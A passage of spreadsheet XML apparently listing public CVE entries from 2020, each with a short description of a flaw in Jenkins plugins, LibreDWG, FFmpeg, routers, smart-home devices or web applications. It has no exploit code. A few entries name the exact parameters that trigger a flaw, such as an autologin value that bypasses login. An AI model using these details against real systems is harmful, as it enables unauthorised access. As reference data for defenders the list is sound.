    <t>Jenkins AWS SAM Plugin 1.2.2 and earlier does not configure its YAML parser to prevent the instantiation of arbitrary types, resulting in a remote code execution vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-21806</t>
  </si>
  <si>
    <t>SQL Injection Vulnerability in ECTouch v2 via the shop page in index.php..</t>
  </si>
  <si>
    <t>CVE-2020-21808</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in NukeViet CMS 4.0.10 - 4.3.07 via:the topicsid parameter in modules/news/admin/addtotopics.php.</t>
  </si>
  <si>
    <t>CVE-2020-21809</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in NukeViet CMS module Shops 4.0.29 and 4.3 via the (1) listid parameter in detail.php and the (2) group_price or groupid parameters in search_result.php.</t>
  </si>
  <si>
    <t>CVE-2020-2181</t>
  </si>
  <si>
    <t>Jenkins Credentials Binding Plugin 1.22 and earlier does not mask (i.e., replace with asterisks) secrets in the build log when the build contains no build steps.</t>
  </si>
  <si>
    <t>CVE-2020-21813</t>
  </si>
  <si>
    <t>A heap based buffer overflow issue exists in GNU LibreDWG 0.10.2641 via output_TEXT ../../programs/dwg2SVG.c:114.</t>
  </si>
  <si>
    <t>CVE-2020-21814</t>
  </si>
  <si>
    <t>A heap based buffer overflow issue exists in GNU LibreDWG 0.10.2641 via htmlwescape ../../programs/escape.c:97.</t>
  </si>
  <si>
    <t>CVE-2020-21815</t>
  </si>
  <si>
    <t>A null pointer deference issue exists in GNU LibreDWG 0.10.2641 via output_TEXT ../../programs/dwg2SVG.c:114, which causes a denial of service (application crash).</t>
  </si>
  <si>
    <t>CVE-2020-21816</t>
  </si>
  <si>
    <t>A heab based buffer overflow issue exists in GNU LibreDWG 0.10.2641 via htmlescape ../../programs/escape.c:46.</t>
  </si>
  <si>
    <t>CVE-2020-21817</t>
  </si>
  <si>
    <t>A null pointer dereference issue exists in GNU LibreDWG 0.10.2641 via htmlescape ../../programs/escape.c:29. which causes a denial of service (application crash).</t>
  </si>
  <si>
    <t>CVE-2020-21818</t>
  </si>
  <si>
    <t>A heap based buffer overflow vulnerability exists in GNU LibreDWG 0.10.2641 via htmlescape ../../programs/escape.c:48.</t>
  </si>
  <si>
    <t>CVE-2020-21819</t>
  </si>
  <si>
    <t>A heap based buffer overflow vulnerability exists in GNU LibreDWG 0.10.2641via htmlescape ../../programs/escape.c:51.</t>
  </si>
  <si>
    <t>CVE-2020-2182</t>
  </si>
  <si>
    <t>Jenkins Credentials Binding Plugin 1.22 and earlier does not mask (i.e., replace with asterisks) secrets containing a `$` character in some circumstances.</t>
  </si>
  <si>
    <t>CVE-2020-21827</t>
  </si>
  <si>
    <t>A heap based buffer overflow vulnerability exists in GNU LibreDWG 0.10 via read_2004_compressed_section ../../src/decode.c:2379.</t>
  </si>
  <si>
    <t>CVE-2020-2183</t>
  </si>
  <si>
    <t>Jenkins Copy Artifact Plugin 1.43.1 and earlier performs improper permission checks, allowing attackers to copy artifacts from jobs they have no permission to access.</t>
  </si>
  <si>
    <t>CVE-2020-21830</t>
  </si>
  <si>
    <t>A heap based buffer overflow vulneraibility exists in GNU LibreDWG 0.10 via bit_calc_CRC ../../src/bits.c:2213.</t>
  </si>
  <si>
    <t>CVE-2020-21831</t>
  </si>
  <si>
    <t>A heap based buffer overflow vulnerability exists in GNU LibreDWG 0.10 via read_2004_section_handles ../../src/decode.c:2637.</t>
  </si>
  <si>
    <t>CVE-2020-21832</t>
  </si>
  <si>
    <t>A heap based buffer overflow vulnerability exists in GNU LibreDWG 0.10 via read_2004_compressed_section ../../src/decode.c:2417.</t>
  </si>
  <si>
    <t>CVE-2020-21833</t>
  </si>
  <si>
    <t>A heap based buffer overflow vulnerability exits in GNU LibreDWG 0.10 via: read_2004_section_classes ../../src/decode.c:2440.</t>
  </si>
  <si>
    <t>CVE-2020-21834</t>
  </si>
  <si>
    <t>A null pointer deference issue exists in GNU LibreDWG 0.10 via get_bmp ../../programs/dwgbmp.c:164.</t>
  </si>
  <si>
    <t>CVE-2020-21835</t>
  </si>
  <si>
    <t>A null pointer deference issue exists in GNU LibreDWG 0.10 via read_2004_compressed_section ../../src/decode.c:2337.</t>
  </si>
  <si>
    <t>CVE-2020-21836</t>
  </si>
  <si>
    <t>A heap based buffer overflow vulnerability exists in GNU LibreDWG 0.10 via read_2004_section_preview ../../src/decode.c:3175.</t>
  </si>
  <si>
    <t>CVE-2020-21838</t>
  </si>
  <si>
    <t>A heap based buffer overflow vulnerability exits in GNU LibreDWG 0.10 via: read_2004_section_appinfo ../../src/decode.c:2842.</t>
  </si>
  <si>
    <t>CVE-2020-21839</t>
  </si>
  <si>
    <t>An issue was discovered in GNU LibreDWG 0.10. Crafted input will lead to an memory leak in dwg_decode_eed ../../src/decode.c:3638.</t>
  </si>
  <si>
    <t>CVE-2020-2184</t>
  </si>
  <si>
    <t>A cross-site request forgery vulnerability in Jenkins CVS Plugin 2.15 and earlier allows attackers to create and manipulate tags, and to connect to an attacker-specified URL.</t>
  </si>
  <si>
    <t>CVE-2020-21840</t>
  </si>
  <si>
    <t>A heap based buffer overflow vulnerability exits in GNU LibreDWG 0.10 via bit_search_sentinel ../../src/bits.c:1985.</t>
  </si>
  <si>
    <t>CVE-2020-21841</t>
  </si>
  <si>
    <t>A heap based buffer overflow vulnerability exits in GNU LibreDWG 0.10 via bit_read_B ../../src/bits.c:135.</t>
  </si>
  <si>
    <t>CVE-2020-21842</t>
  </si>
  <si>
    <t>A heap based buffer overflow vulnerability exists in GNU LibreDWG 0.10 via read_2004_section_revhistory ../../src/decode.c:3051.</t>
  </si>
  <si>
    <t>CVE-2020-21843</t>
  </si>
  <si>
    <t>A heap based buffer overflow vulnerability exits in GNU LibreDWG 0.10 via bit_read_RC ../../src/bits.c:318.</t>
  </si>
  <si>
    <t>CVE-2020-21844</t>
  </si>
  <si>
    <t>GNU LibreDWG 0.10 is affected by: memcpy-param-overlap. The impact is: execute arbitrary code (remote). The component is: read_2004_section_header ../../src/decode.c:2580.</t>
  </si>
  <si>
    <t>CVE-2020-21845</t>
  </si>
  <si>
    <t>Codoforum 4.8.3 allows HTML Injection in the 'admin dashboard Manage users Section.'</t>
  </si>
  <si>
    <t>CVE-2020-2185</t>
  </si>
  <si>
    <t>Jenkins Amazon EC2 Plugin 1.50.1 and earlier does not validate SSH host keys when connecting agents, enabling man-in-the-middle attacks.</t>
  </si>
  <si>
    <t>CVE-2020-21854</t>
  </si>
  <si>
    <t>Cross Site Scripting vulnerabiity exists in WDScanner 1.1 in the system management page.</t>
  </si>
  <si>
    <t>CVE-2020-2186</t>
  </si>
  <si>
    <t>A cross-site request forgery vulnerability in Jenkins Amazon EC2 Plugin 1.50.1 and earlier allows attackers to provision instances.</t>
  </si>
  <si>
    <t>CVE-2020-21865</t>
  </si>
  <si>
    <t>ThinkPHP50-CMS v1.0 contains a remote code execution (RCE) vulnerability in the component /public/?s=captcha.</t>
  </si>
  <si>
    <t>CVE-2020-2187</t>
  </si>
  <si>
    <t>Jenkins Amazon EC2 Plugin 1.50.1 and earlier unconditionally accepts self-signed certificates and does not perform hostname validation, enabling man-in-the-middle attacks.</t>
  </si>
  <si>
    <t>CVE-2020-2188</t>
  </si>
  <si>
    <t>A missing permission check in Jenkins Amazon EC2 Plugin 1.50.1 and earlier in form-related methods allowed users with Overall/Read access to enumerate credentials ID of credentials stored in Jenkins.</t>
  </si>
  <si>
    <t>CVE-2020-21883</t>
  </si>
  <si>
    <t>Unibox U-50 2.4 and UniBox Enterprise Series 2.4 and UniBox Campus Series 2.4 contain a OS command injection vulnerability in /tools/ping, which can leads to complete device takeover.</t>
  </si>
  <si>
    <t>CVE-2020-21884</t>
  </si>
  <si>
    <t>Unibox SMB 2.4 and UniBox Enterprise Series 2.4 and UniBox Campus Series 2.4 contain a cross-site request forgery (CSRF) vulnerability in /tools/network-trace, /list_users, /list_byod?usertype=raduser, /dhcp_leases, /go?rid=202 in which a specially crafted HTTP request may reconfigure the device.</t>
  </si>
  <si>
    <t>CVE-2020-2189</t>
  </si>
  <si>
    <t>Jenkins SCM Filter Jervis Plugin 0.2.1 and earlier does not configure its YAML parser to prevent the instantiation of arbitrary types, resulting in a remote code execution vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-2190</t>
  </si>
  <si>
    <t>Jenkins Script Security Plugin 1.72 and earlier does not correctly escape pending or approved classpath entries on the In-process Script Approval page, resulting in a stored cross-site scripting vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-2191</t>
  </si>
  <si>
    <t>Jenkins Self-Organizing Swarm Plug-in Modules Plugin 3.20 and earlier does not check permissions on API endpoints that allow adding and removing agent labels.</t>
  </si>
  <si>
    <t>CVE-2020-21913</t>
  </si>
  <si>
    <t>International Components for Unicode (ICU-20850) v66.1 was discovered to contain a use after free bug in the pkg_createWithAssemblyCode function in the file tools/pkgdata/pkgdata.cpp.</t>
  </si>
  <si>
    <t>CVE-2020-2192</t>
  </si>
  <si>
    <t>A cross-site request forgery vulnerability in Jenkins Self-Organizing Swarm Plug-in Modules Plugin 3.20 and earlier allows attackers to add or remove agent labels.</t>
  </si>
  <si>
    <t>CVE-2020-21929</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability in the web_copyright field of Eyoucms v1.4.1 allows authenticated attackers to execute arbitrary web scripts or HTML.</t>
  </si>
  <si>
    <t>CVE-2020-2193</t>
  </si>
  <si>
    <t>Jenkins ECharts API Plugin 4.7.0-3 and earlier does not escape the parser identifier when rendering charts, resulting in a stored cross-site scripting vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-21930</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability in the web_attr_2 field of Eyoucms v1.4.1 allows authenticated attackers to execute arbitrary web scripts or HTML.</t>
  </si>
  <si>
    <t>CVE-2020-21932</t>
  </si>
  <si>
    <t>A vulnerability in /Login.html of Motorola CX2 router CX 1.0.2 Build 20190508 Rel.97360n allows attackers to bypass login and obtain a partially authorized token and uid.</t>
  </si>
  <si>
    <t>CVE-2020-21933</t>
  </si>
  <si>
    <t>An issue was discovered in Motorola CX2 router CX 1.0.2 Build 20190508 Rel.97360n where the admin password and private key could be found in the log tar package.</t>
  </si>
  <si>
    <t>CVE-2020-21934</t>
  </si>
  <si>
    <t>An issue was discovered in Motorola CX2 router CX 1.0.2 Build 20190508 Rel.97360n where authentication to download the Syslog could be bypassed.</t>
  </si>
  <si>
    <t>CVE-2020-21935</t>
  </si>
  <si>
    <t>A command injection vulnerability in HNAP1/GetNetworkTomographySettings of Motorola CX2 router CX 1.0.2 Build 20190508 Rel.97360n allows attackers to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-21936</t>
  </si>
  <si>
    <t>An issue in HNAP1/GetMultipleHNAPs of Motorola CX2 router CX 1.0.2 Build 20190508 Rel.97360n allows attackers to access the components GetStationSettings, GetWebsiteFilterSettings and GetNetworkSettings without authentication.</t>
  </si>
  <si>
    <t>CVE-2020-21937</t>
  </si>
  <si>
    <t>An command injection vulnerability in HNAP1/SetWLanApcliSettings of Motorola CX2 router CX 1.0.2 Build 20190508 Rel.97360n allows attackers to execute arbitrary system commands.</t>
  </si>
  <si>
    <t>CVE-2020-2194</t>
  </si>
  <si>
    <t>Jenkins ECharts API Plugin 4.7.0-3 and earlier does not escape the display name of the builds in the trend chart, resulting in a stored cross-site scripting vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-2195</t>
  </si>
  <si>
    <t>Jenkins Compact Columns Plugin 1.11 and earlier displays the unprocessed job description in tooltips, resulting in a stored cross-site scripting vulnerability that can be exploited by users with Job/Configure permission.</t>
  </si>
  <si>
    <t>CVE-2020-2196</t>
  </si>
  <si>
    <t>Jenkins Selenium Plugin 3.141.59 and earlier has no CSRF protection for its HTTP endpoints, allowing attackers to perform all administrative actions provided by the plugin.</t>
  </si>
  <si>
    <t>CVE-2020-21967</t>
  </si>
  <si>
    <t>File upload vulnerability in the Catalog feature in Prestashop 1.7.6.7 allows remote attackers to run arbitrary code via the add new file page.</t>
  </si>
  <si>
    <t>CVE-2020-2197</t>
  </si>
  <si>
    <t>Jenkins Project Inheritance Plugin 19.08.02 and earlier does not require users to have Job/ExtendedRead permission to access Inheritance Project job configurations in XML format.</t>
  </si>
  <si>
    <t>CVE-2020-21976</t>
  </si>
  <si>
    <t>An arbitrary file upload in the &lt;input type="file" name="user_image"&gt; component of NewsOne CMS v1.1.0 allows attackers to webshell and execute arbitrary commands.</t>
  </si>
  <si>
    <t>CVE-2020-2198</t>
  </si>
  <si>
    <t>Jenkins Project Inheritance Plugin 19.08.02 and earlier does not redact encrypted secrets in the 'getConfigAsXML' API URL when transmitting job config.xml data to users without Job/Configure.</t>
  </si>
  <si>
    <t>CVE-2020-21987</t>
  </si>
  <si>
    <t>HomeAutomation 3.3.2 is affected by persistent Cross Site Scripting (XSS). XSS vulnerabilities occur when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session.</t>
  </si>
  <si>
    <t>CVE-2020-21989</t>
  </si>
  <si>
    <t>HomeAutomation 3.3.2 is affected by Cross Site Request Forgery (CSRF). The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.</t>
  </si>
  <si>
    <t>CVE-2020-2199</t>
  </si>
  <si>
    <t>Jenkins Subversion Partial Release Manager Plugin 1.0.1 and earlier does not escape the error message for the repository URL field form validation, resulting in a reflected cross-site scripting vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-21990</t>
  </si>
  <si>
    <t>Emmanuel MyDomoAtHome (MDAH) REST API REST API Domoticz ISS Gateway 0.2.40 is affected by an information disclosure vulnerability due to improper access control enforcement. An unauthenticated remote attacker can exploit this, via a specially crafted request to gain access to sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-21991</t>
  </si>
  <si>
    <t>AVE DOMINAplus &lt;=1.10.x suffers from an authentication bypass vulnerability due to missing control check when directly calling the autologin GET parameter in changeparams.php script. Setting the autologin value to 1 allows an unauthenticated attacker to permanently disable the authentication security control and access the management interface with admin privileges without providing credentials.</t>
  </si>
  <si>
    <t>CVE-2020-21992</t>
  </si>
  <si>
    <t>Inim Electronics SmartLiving SmartLAN/G/SI &lt;=6.x suffers from an authenticated remote command injection vulnerability. The issue exist due to the 'par' POST parameter not being sanitized when called with the 'testemail' module through web.cgi binary. The vulnerable CGI binary (ELF 32-bit LSB executable, ARM) is calling the 'sh' executable via the system() function to issue a command using the mailx service and its vulnerable string format parameter allowing for OS command injection with root privileges. An attacker can remotely execute system commands as the root user using default credentials and bypass access controls in place.</t>
  </si>
  <si>
    <t>CVE-2020-21993</t>
  </si>
  <si>
    <t>In WEMS Limited Enterprise Manager 2.58, input passed to the GET parameter 'email' is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML code in a user's browser session in context of an affected site.</t>
  </si>
  <si>
    <t>CVE-2020-21994</t>
  </si>
  <si>
    <t>AVE DOMINAplus &lt;=1.10.x suffers from clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file '/xml/authClients.xml' and obtain administrative login information that allows for a successful authentication bypass attack.</t>
  </si>
  <si>
    <t>CVE-2020-21995</t>
  </si>
  <si>
    <t>Inim Electronics Smartliving SmartLAN/G/SI &lt;=6.x uses default hardcoded credentials. An attacker could exploit this to gain Telnet, SSH and FTP access to the system.</t>
  </si>
  <si>
    <t>CVE-2020-21996</t>
  </si>
  <si>
    <t>AVE DOMINAplus &lt;=1.10.x suffers from an unauthenticated reboot command execution. Attackers can exploit this issue to cause a denial of service scenario.</t>
  </si>
  <si>
    <t>CVE-2020-21997</t>
  </si>
  <si>
    <t>Smartwares HOME easy &lt;=1.0.9 is vulnerable to an unauthenticated database backup download and information disclosure vulnerability. An attacker could disclose sensitive and clear-text information resulting in authentication bypass, session hijacking and full system control.</t>
  </si>
  <si>
    <t>CVE-2020-21998</t>
  </si>
  <si>
    <t>In HomeAutomation 3.3.2 input passed via the 'redirect' GET parameter in 'api.php' script is not properly verified before being used to redirect users. This can be exploited to redirect a user to an arbitrary website e.g. when a user clicks a specially crafted link to the affected script hosted on a trusted domain.</t>
  </si>
  <si>
    <t>CVE-2020-21999</t>
  </si>
  <si>
    <t>iWT Ltd FaceSentry Access Control System 6.4.8 suffers from an authenticated OS command injection vulnerability using default credentials. This can be exploited to inject and execute arbitrary shell commands as the root user via the 'strInIP' POST parameter in pingTest PHP script.</t>
  </si>
  <si>
    <t>CVE-2020-2200</t>
  </si>
  <si>
    <t>Jenkins Play Framework Plugin 1.0.2 and earlier lets users specify the path to the `play` command on the Jenkins master for a form validation endpoint, resulting in an OS command injection vulnerability exploitable by users able to store such a file on the Jenkins master.</t>
  </si>
  <si>
    <t>CVE-2020-22000</t>
  </si>
  <si>
    <t>HomeAutomation 3.3.2 suffers from an authenticated OS command execution vulnerability using custom command v0.1 plugin. This can be exploited with a CSRF vulnerability to execute arbitrary shell commands as the web user via the 'set_command_on' and 'set_command_off' POST parameters in '/system/systemplugins/customcommand/customcommand.plugin.php' by using an unsanitized PHP exec() function.</t>
  </si>
  <si>
    <t>CVE-2020-22001</t>
  </si>
  <si>
    <t>HomeAutomation 3.3.2 suffers from an authentication bypass vulnerability when spoofing client IP address using the X-Forwarded-For header with the local (loopback) IP address value allowing remote control of the smart home solution.</t>
  </si>
  <si>
    <t>CVE-2020-22002</t>
  </si>
  <si>
    <t>An Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in Inim Electronics Smartliving SmartLAN/G/SI &lt;=6.x within the GetImage functionality. The application parses user supplied data in the GET parameter 'host' to construct an image request to the service through onvif.cgi. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host.</t>
  </si>
  <si>
    <t>CVE-2020-2201</t>
  </si>
  <si>
    <t>Jenkins Sonargraph Integration Plugin 3.0.0 and earlier does not escape the file path for the Log file field form validation, resulting in a stored cross-site scripting vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-22015</t>
  </si>
  <si>
    <t>Buffer Overflow vulnerability in FFmpeg 4.2 in mov_write_video_tag due to the out of bounds in libavformat/movenc.c, which could let a remote malicious user obtain sensitive information, cause a Denial of Service, or execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-22016</t>
  </si>
  <si>
    <t>A heap-based Buffer Overflow vulnerability in FFmpeg 4.2 at libavcodec/get_bits.h when writing .mov files, which might lead to memory corruption and other potential consequences.</t>
  </si>
  <si>
    <t>CVE-2020-22017</t>
  </si>
  <si>
    <t>A heap-based Buffer Overflow vulnerability exists in FFmpeg 4.2 at ff_fill_rectangle in libavfilter/drawutils.c, which might lead to memory corruption and other potential consequences.</t>
  </si>
  <si>
    <t>CVE-2020-22019</t>
  </si>
  <si>
    <t>Buffer Overflow vulnerability in FFmpeg 4.2 at convolution_y_10bit in libavfilter/vf_vmafmotion.c, which could let a remote malicious user cause a Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2020-2202</t>
  </si>
  <si>
    <t>A missing permission check in Jenkins Fortify on Demand Plugin 6.0.0 and earlier in form-related methods allowed users with Overall/Read access to enumerate credentials ID of credentials stored in Jenkins.</t>
  </si>
  <si>
    <t>CVE-2020-22020</t>
  </si>
  <si>
    <t>Buffer Overflow vulnerability in FFmpeg 4.2 in the build_diff_map function in libavfilter/vf_fieldmatch.c, which could let a remote malicious user cause a Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2020-22021</t>
  </si>
  <si>
    <t>Buffer Overflow vulnerability in FFmpeg 4.2 at filter_edges function in libavfilter/vf_yadif.c, which could let a remote malicious user cause a Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2020-22022</t>
  </si>
  <si>
    <t>A heap-based Buffer Overflow vulnerability exists in FFmpeg 4.2 in filter_frame at libavfilter/vf_fieldorder.c, which might lead to memory corruption and other potential consequences.</t>
  </si>
  <si>
    <t>CVE-2020-22023</t>
  </si>
  <si>
    <t>A heap-based Buffer Overflow vulnerabililty exists in FFmpeg 4.2 in filter_frame at libavfilter/vf_bitplanenoise.c, which might lead to memory corruption and other potential consequences.</t>
  </si>
  <si>
    <t>CVE-2020-22024</t>
  </si>
  <si>
    <t>Buffer Overflow vulnerability in FFmpeg 4.2 at the lagfun_frame16 function in libavfilter/vf_lagfun.c, which could let a remote malicious user cause Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2020-22025</t>
  </si>
  <si>
    <t>A heap-based Buffer Overflow vulnerability exists in gaussian_blur at libavfilter/vf_edgedetect.c, which might lead to memory corruption and other potential consequences.</t>
  </si>
  <si>
    <t>CVE-2020-22026</t>
  </si>
  <si>
    <t>Buffer Overflow vulnerability exists in FFmpeg 4.2 in the config_input function at libavfilter/af_tremolo.c, which could let a remote malicious user cause a Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2020-22027</t>
  </si>
  <si>
    <t>A heap-based Buffer Overflow vulnerability exits in FFmpeg 4.2 in deflate16 at libavfilter/vf_neighbor.c, which might lead to memory corruption and other potential consequences.</t>
  </si>
  <si>
    <t>CVE-2020-22028</t>
  </si>
  <si>
    <t>Buffer Overflow vulnerability exists in FFmpeg 4.2 in filter_vertically_8 at libavfilter/vf_avgblur.c, which could cause a remote Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2020-22029</t>
  </si>
  <si>
    <t>A heap-based Buffer Overflow vulnerability exists in FFmpeg 4.2 at libavfilter/vf_colorconstancy.c: in slice_get_derivative, which crossfade_samples_fltp, which might lead to memory corruption and other potential consequences.</t>
  </si>
  <si>
    <t>CVE-2020-2203</t>
  </si>
  <si>
    <t>A cross-site request forgery vulnerability in Jenkins Fortify on Demand Plugin 5.0.1 and earlier allows attackers to connect to the globally configured Fortify on Demand endpoint using attacker-specified credentials IDs.</t>
  </si>
  <si>
    <t>CVE-2020-22030</t>
  </si>
  <si>
    <t>A heap-based Buffer Overflow vulnerability exists in FFmpeg 4.2 at libavfilter/af_afade.c in crossfade_samples_fltp, which might lead to memory corruption and other potential consequences.</t>
  </si>
  <si>
    <t>CVE-2020-22031</t>
  </si>
  <si>
    <t>A Heap-based Buffer Overflow vulnerability exists in FFmpeg 4.2 at libavfilter/vf_w3fdif.c in filter16_complex_low, which might lead to memory corruption and other potential consequences.</t>
  </si>
  <si>
    <t>CVE-2020-22032</t>
  </si>
  <si>
    <t>A heap-based Buffer Overflow vulnerability exists FFmpeg 4.2 at libavfilter/vf_edgedetect.c in gaussian_blur, which might lead to memory corruption and other potential consequences.</t>
  </si>
  <si>
    <t>CVE-2020-22033</t>
  </si>
  <si>
    <t>A heap-based Buffer Overflow Vulnerability exists FFmpeg 4.2 at libavfilter/vf_vmafmotion.c in convolution_y_8bit, which could let a remote malicious user cause a Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2020-22034</t>
  </si>
  <si>
    <t>A heap-based Buffer Overflow vulnerability exists FFmpeg 4.2 at libavfilter/vf_floodfill.c, which might lead to memory corruption and other potential consequences.</t>
  </si>
  <si>
    <t>CVE-2020-22035</t>
  </si>
  <si>
    <t>A heap-based Buffer Overflow vulnerability exists in FFmpeg 4.2 in get_block_row at libavfilter/vf_bm3d.c, which might lead to memory corruption and other potential consequences.</t>
  </si>
  <si>
    <t>CVE-2020-22036</t>
  </si>
  <si>
    <t>A heap-based Buffer Overflow vulnerability exists in FFmpeg 4.2 in filter_intra at libavfilter/vf_bwdif.c, which might lead to memory corruption and other potential consequences.</t>
  </si>
  <si>
    <t>CVE-2020-22037</t>
  </si>
  <si>
    <t>A Denial of Service vulnerability exists in FFmpeg 4.2 due to a memory leak in avcodec_alloc_context3 at options.c.</t>
  </si>
  <si>
    <t>CVE-2020-22038</t>
  </si>
  <si>
    <t>A Denial of Service vulnerability exists in FFmpeg 4.2 due to a memory leak in the ff_v4l2_m2m_create_context function in v4l2_m2m.c.</t>
  </si>
  <si>
    <t>CVE-2020-22039</t>
  </si>
  <si>
    <t>A Denial of Service vulnerability exists in FFmpeg 4.2 due to a memory leak in the inavi_add_ientry function.</t>
  </si>
  <si>
    <t>CVE-2020-2204</t>
  </si>
  <si>
    <t>A missing permission check in Jenkins Fortify on Demand Plugin 5.0.1 and earlier allows attackers with Overall/Read permission to connect to the globally configured Fortify on Demand endpoint using attacker-specified credentials IDs.</t>
  </si>
  <si>
    <t>CVE-2020-22040</t>
  </si>
  <si>
    <t>A Denial of Service vulnerability exists in FFmpeg 4.2 idue to a memory leak in the v_frame_alloc function in frame.c.</t>
  </si>
  <si>
    <t>CVE-2020-22041</t>
  </si>
  <si>
    <t>A Denial of Service vulnerability exists in FFmpeg 4.2 due to a memory leak in the av_buffersrc_add_frame_flags function in buffersrc.</t>
  </si>
  <si>
    <t>CVE-2020-22042</t>
  </si>
  <si>
    <t>A Denial of Service vulnerability exists in FFmpeg 4.2 due to a memory leak is affected by: memory leak in the link_filter_inouts function in libavfilter/graphparser.c.</t>
  </si>
  <si>
    <t>CVE-2020-22043</t>
  </si>
  <si>
    <t>A Denial of Service vulnerability exists in FFmpeg 4.2 due to a memory leak at the fifo_alloc_common function in libavutil/fifo.c.</t>
  </si>
  <si>
    <t>CVE-2020-22044</t>
  </si>
  <si>
    <t>A Denial of Service vulnerability exists in FFmpeg 4.2 due to a memory leak in the url_open_dyn_buf_internal function in libavformat/aviobuf.c.</t>
  </si>
  <si>
    <t>CVE-2020-22046</t>
  </si>
  <si>
    <t>A Denial of Service vulnerability exists in FFmpeg 4.2 due to a memory leak in the avpriv_float_dsp_allocl function in libavutil/float_dsp.c.</t>
  </si>
  <si>
    <t>CVE-2020-22048</t>
  </si>
  <si>
    <t>A Denial of Service vulnerability exists in FFmpeg 4.2 due to a memory leak in the ff_frame_pool_get function in framepool.c.</t>
  </si>
  <si>
    <t>CVE-2020-22049</t>
  </si>
  <si>
    <t>A Denial of Service vulnerability exists in FFmpeg 4.2 due to a memory leak in the wtvfile_open_sector function in wtvdec.c.</t>
  </si>
  <si>
    <t>CVE-2020-2205</t>
  </si>
  <si>
    <t>Jenkins VncRecorder Plugin 1.25 and earlier does not escape a tool path in the `checkVncServ` form validation endpoint, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by Jenkins administrators.</t>
  </si>
  <si>
    <t>CVE-2020-22051</t>
  </si>
  <si>
    <t>A Denial of Service vulnerability exists in FFmpeg 4.2 due to a memory leak in the filter_frame function in vf_tile.c.</t>
  </si>
  <si>
    <t>CVE-2020-22054</t>
  </si>
  <si>
    <t>A Denial of Service vulnerability exists in FFmpeg 4.2 due to a memory leak in the av_dict_set function in dict.c.</t>
  </si>
  <si>
    <t>CVE-2020-22056</t>
  </si>
  <si>
    <t>A Denial of Service vulnerability exists in FFmpeg 4.2 due to a memory leak in the config_input function in af_acrossover.c.</t>
  </si>
  <si>
    <t>CVE-2020-22057</t>
  </si>
  <si>
    <t>The WinRin0x64.sys and WinRing0.sys low-level drivers in EVGA Precision XOC version v6.2.7 were discovered to be configured with the default security descriptor which allows attackers to access sensitive components and data.</t>
  </si>
  <si>
    <t>CVE-2020-2206</t>
  </si>
  <si>
    <t>Jenkins VncRecorder Plugin 1.25 and earlier does not escape a parameter value in the checkVncServ form validation endpoint, resulting in a reflected cross-site scripting (XSS) vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-22061</t>
  </si>
  <si>
    <t>SUPERAntispyware v8.0.0.1050 was discovered to contain an issue in the component saskutil64.sys. This issue allows attackers to arbitrarily write data to the device via IOCTL 0x9C402140.</t>
  </si>
  <si>
    <t>CVE-2020-2207</t>
  </si>
  <si>
    <t>Jenkins VncViewer Plugin 1.7 and earlier does not escape a parameter value in the checkVncServ form validation endpoint, resulting in a reflected cross-site scripting (XSS) vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-22079</t>
  </si>
  <si>
    <t>Stack-based buffer overflow in Tenda AC-10U AC1200 Router US_AC10UV1.0RTL_V15.03.06.48_multi_TDE01 allows remote attackers to execute arbitrary code via the timeZone parameter to goform/SetSysTimeCfg.</t>
  </si>
  <si>
    <t>CVE-2020-2208</t>
  </si>
  <si>
    <t>Jenkins Slack Upload Plugin 1.7 and earlier stores a secret unencrypted in job config.xml files on the Jenkins master where it can be viewed by users with Extended Read permission, or access to the master file system.</t>
  </si>
  <si>
    <t>CVE-2020-22083</t>
  </si>
  <si>
    <t>** DISPUTED ** jsonpickle through 1.4.1 allows remote code execution during deserialization of a malicious payload through the decode() function. Note: It has been argued that this is expected and clearly documented behaviour. pickle is known to be capable of causing arbitrary code execution, and must not be used with un-trusted data.</t>
  </si>
  <si>
    <t>CVE-2020-2209</t>
  </si>
  <si>
    <t>Jenkins TestComplete support Plugin 2.4.1 and earlier stores a password unencrypted in job config.xml files on the Jenkins master where it can be viewed by users with Extended Read permission, or access to the master file system.</t>
  </si>
  <si>
    <t>CVE-2020-2210</t>
  </si>
  <si>
    <t>Jenkins Stash Branch Parameter Plugin 0.3.0 and earlier transmits configured passwords in plain text as part of its global Jenkins configuration form, potentially resulting in their exposure.</t>
  </si>
  <si>
    <t>CVE-2020-2211</t>
  </si>
  <si>
    <t>Jenkins ElasticBox Jenkins Kubernetes CI/CD Plugin 1.3 and earlier does not configure its YAML parser to prevent the instantiation of arbitrary types, resulting in a remote code execution vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-2212</t>
  </si>
  <si>
    <t>Jenkins GitHub Coverage Reporter Plugin 1.8 and earlier stores secrets unencrypted in its global configuration file on the Jenkins master where they can be viewed by users with access to the master file system or read permissions on the system configuration.</t>
  </si>
  <si>
    <t>CVE-2020-22120</t>
  </si>
  <si>
